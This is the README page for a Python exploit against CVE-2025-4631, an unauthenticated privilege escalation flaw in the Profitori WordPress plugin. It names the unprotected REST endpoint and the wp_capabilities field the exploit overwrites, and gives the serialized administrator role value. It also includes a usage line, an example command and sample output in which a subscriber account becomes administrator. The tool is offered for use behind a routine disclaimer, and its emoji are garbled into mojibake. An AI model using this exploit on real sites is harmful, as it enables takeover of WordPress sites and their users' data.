## https://sploitus.com/exploit?id=EDDBE825-8084-5420-9BDA-4EFD4FDF5E1B
## π¨ CVE-2025-4631 - Profitori WordPress Plugin Privilege Escalation Exploit
### π Vulnerability Summary
**Profitori Plugin (versions 2.0.6.0 to 2.1.1.3)** is vulnerable to **unauthenticated privilege escalation** due to a missing capability check in the `/wp-json/stocktend/v1/stocktend_object` endpoint. This allows remote attackers to escalate the privileges of existing users (or create new ones) by directly manipulating the `wp_capabilities` meta field.
- **CVE**: CVE-2025-4631
- **CVSS Score**: 9.8 (Critical)
- **Published**: May 30, 2025
- **Last Updated**: May 31, 2025
---
## π οΈ What This Script Does
This Python exploit automates the privilege escalation process by:
1. β Checking the plugin version via the `readme.txt` file.
2. π Exploiting the vulnerable REST API endpoint if a vulnerable version is detected.
3. π‘ Sending the payload to escalate a userβs privileges to Administrator.
4. π§Ύ Printing formatted, detailed results including the modified userβs credentials.
If the version check fails, the exploit proceeds cautiously with a warning.
---
## πΈ Exploit Proof

---
## π» Usage
```bash
usage: CVE-2025-4631.py [-h] -u URL -id ID [--email EMAIL] [--name NAME] [--url_field URL_FIELD] [--verbose]
```
### Example:
```bash
python CVE-2025-4631.py -u http://nxploit.ddev.site -id 3
```
### Sample Output:
```
[π] Checking plugin version at: http://nxploit.ddev.site/wp-content/plugins/profitori/readme.txt
[β ] Vulnerable version detected: 2.1.1.3
[π] Exploiting in 3 seconds...
[π‘] Sending privilege escalation request to: http://nxploit.ddev.site/wp-json/stocktend/v1/stocktend_object
[π―] Exploit completed successfully!
[π§Ύ] Updated User Information:
--------------------------------------
π User ID : 3
π€ Username : subscriber
π§ Email : subscriber@example.com
πͺͺ Display Name : Subscriber User
π User URL :
π‘ Role Raw : a:1:{s:13:"administrator";b:1;}
[π] Exploit By : Nxploited (Khaled_alenazi)
π GitHub : https://github.com/Nxploited
π§ Email : NxploitBot@gmal.com
```
---
## βοΈ Script Arguments
| Flag | Description | Required |
|--------------------|--------------------------------------------------|----------|
| `-u`, `--url` | π Base URL of the WordPress site | β Yes |
| `-id` | π ID of the user to escalate | β Yes |
| `--email` | π§ Fake email to display | β No |
| `--name` | π€ Display name | β No |
| `--url_field` | π User URL field | β No |
| `--verbose` | π Print full JSON response | β No |
---
## π Requirements
- Python 3.x
- `requests` library
Install via:
```bash
pip install requests
```
---
## β οΈ Disclaimer
This tool is provided for **educational and authorized testing purposes only**. Any misuse of this exploit against systems you do not own or have explicit permission to test is **strictly prohibited**. The creator is not responsible for any damages or legal consequences arising from improper usage.
---
*BY: Nxploited ( Khaled_Alenazi )*